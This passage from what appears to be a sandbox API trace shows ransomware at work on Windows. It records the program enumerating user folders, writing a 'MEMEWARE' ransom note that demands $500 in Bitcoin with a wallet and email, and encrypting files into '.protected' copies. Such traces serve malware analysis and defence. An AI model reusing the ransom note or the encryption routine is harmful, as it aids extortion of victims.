HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0090.313] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.313] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.313] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.313] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.313] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.313] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\.") returned 67 [0090.313] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.313] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.313] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.313] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.313] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.313] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.313] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.313] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\..") returned 68 [0090.313] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.313] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.313] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0090.313] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0090.314] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\RESTORE_FILES.txt") returned 83 [0090.314] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\proof\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0090.314] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.314] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0090.315] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.315] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0090.315] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.315] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0090.315] CloseHandle (hObject=0xd8) returned 1 [0090.316] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0090.316] lstrcmpiW (lpString1="Protect", lpString2="Windows") returned -1 [0090.316] lstrcmpiW (lpString1="Protect", lpString2="Program Files") returned 1 [0090.316] lstrcmpiW (lpString1="Protect", lpString2="Program Files (x86)") returned 1 [0090.316] lstrcmpiW (lpString1="Protect", lpString2="$Recycle.bin") returned 1 [0090.316] lstrcmpiW (lpString1="Protect", lpString2="System Volume Information") returned -1 [0090.316] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect") returned 67 [0090.316] lstrcmpW (lpString1="Protect", lpString2=".") returned 1 [0090.316] lstrcmpW (lpString1="Protect", lpString2="..") returned 1 [0090.316] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\*") returned 69 [0090.316] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0090.316] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.316] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.316] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.316] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.316] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.316] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\.") returned 69 [0090.316] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.316] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0090.316] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0090.316] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0090.316] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0090.316] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.317] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.317] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.317] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.317] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.317] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.317] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.317] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\..") returned 70 [0090.317] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.317] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.317] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0090.317] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0090.317] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0090.317] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0090.317] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.317] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.317] lstrcmpiW (lpString1="CREDHIST", lpString2="Windows") returned -1 [0090.317] lstrcmpiW (lpString1="CREDHIST", lpString2="Program Files") returned -1 [0090.317] lstrcmpiW (lpString1="CREDHIST", lpString2="Program Files (x86)") returned -1 [0090.317] lstrcmpiW (lpString1="CREDHIST", lpString2="$Recycle.bin") returned 1 [0090.317] lstrcmpiW (lpString1="CREDHIST", lpString2="System Volume Information") returned -1 [0090.317] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST") returned 76 [0090.317] StrStrIW (lpFirst="CREDHIST", lpSrch=".protected") returned 0x0 [0090.317] lstrcmpW (lpString1="CREDHIST", lpString2="RESTORE_FILES.txt") returned -1 [0090.317] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0090.317] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0090.317] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\credhist"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0090.318] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST") returned 76 [0090.318] StrStrW (lpFirst="CREDHIST", lpSrch=".txt") returned 0x0 [0090.318] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST") returned 76 [0090.318] StrStrW (lpFirst="CREDHIST", lpSrch=".rar") returned 0x0 [0090.318] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST") returned 76 [0090.318] StrStrW (lpFirst="CREDHIST", lpSrch=".zip") returned 0x0 [0090.318] ReadFile (in: hFile=0x14c, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ea24*=0xa8, lpOverlapped=0x0) returned 1 [0090.319] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffff58, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.319] WriteFile (in: hFile=0x14c, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0xa8, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ea24*=0xa8, lpOverlapped=0x0) returned 1 [0090.319] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.319] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0090.319] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0090.319] CloseHandle (hObject=0x14c) returned 1 [0090.319] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST.protected") returned 86 [0090.319] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\credhist"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\credhist.protected")) returned 1 [0090.320] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.320] lstrcmpiW (lpString1="S-1-5-21-3111613574-2524581245-2586426736-500", lpString2="Windows") returned -1 [0090.321] lstrcmpiW (lpString1="S-1-5-21-3111613574-2524581245-2586426736-500", lpString2="Program Files") returned 1 [0090.321] lstrcmpiW (lpString1="S-1-5-21-3111613574-2524581245-2586426736-500", lpString2="Program Files (x86)") returned 1 [0090.321] lstrcmpiW (lpString1="S-1-5-21-3111613574-2524581245-2586426736-500", lpString2="$Recycle.bin") returned 1 [0090.321] lstrcmpiW (lpString1="S-1-5-21-3111613574-2524581245-2586426736-500", lpString2="System Volume Information") returned -1 [0090.321] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500") returned 113 [0090.321] lstrcmpW (lpString1="S-1-5-21-3111613574-2524581245-2586426736-500", lpString2=".") returned 1 [0090.321] lstrcmpW (lpString1="S-1-5-21-3111613574-2524581245-2586426736-500", lpString2="..") returned 1 [0090.321] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\*") returned 115 [0090.321] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0090.329] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.329] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.329] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.329] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.329] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.329] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\.") returned 115 [0090.329] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.329] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0090.329] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0090.329] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0090.329] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0090.329] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.330] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.330] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.330] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.330] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.330] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.330] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.330] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\..") returned 116 [0090.330] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.330] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.330] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0090.330] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0090.330] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0090.330] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0090.330] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.330] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.330] lstrcmpiW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpString2="Windows") returned -1 [0090.330] lstrcmpiW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpString2="Program Files") returned -1 [0090.330] lstrcmpiW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpString2="Program Files (x86)") returned -1 [0090.330] lstrcmpiW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpString2="$Recycle.bin") returned 1 [0090.330] lstrcmpiW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpString2="System Volume Information") returned -1 [0090.330] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9") returned 150 [0090.330] StrStrIW (lpFirst="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpSrch=".protected") returned 0x0 [0090.330] lstrcmpW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpString2="RESTORE_FILES.txt") returned -1 [0090.330] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0090.330] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0090.330] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0090.331] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9") returned 150 [0090.331] StrStrW (lpFirst="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpSrch=".txt") returned 0x0 [0090.331] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9") returned 150 [0090.331] StrStrW (lpFirst="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpSrch=".rar") returned 0x0 [0090.331] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9") returned 150 [0090.331] StrStrW (lpFirst="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpSrch=".zip") returned 0x0 [0090.331] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1d4, lpOverlapped=0x0) returned 1 [0090.332] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.332] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1d4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1d4, lpOverlapped=0x0) returned 1 [0090.332] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.332] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0090.332] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0090.332] CloseHandle (hObject=0x150) returned 1 [0090.333] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.protected") returned 160 [0090.333] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.protected")) returned 1 [0090.334] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.334] lstrcmpiW (lpString1="Preferred", lpString2="Windows") returned -1 [0090.334] lstrcmpiW (lpString1="Preferred", lpString2="Program Files") returned -1 [0090.334] lstrcmpiW (lpString1="Preferred", lpString2="Program Files (x86)") returned -1 [0090.334] lstrcmpiW (lpString1="Preferred", lpString2="$Recycle.bin") returned 1 [0090.334] lstrcmpiW (lpString1="Preferred", lpString2="System Volume Information") returned -1 [0090.334] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 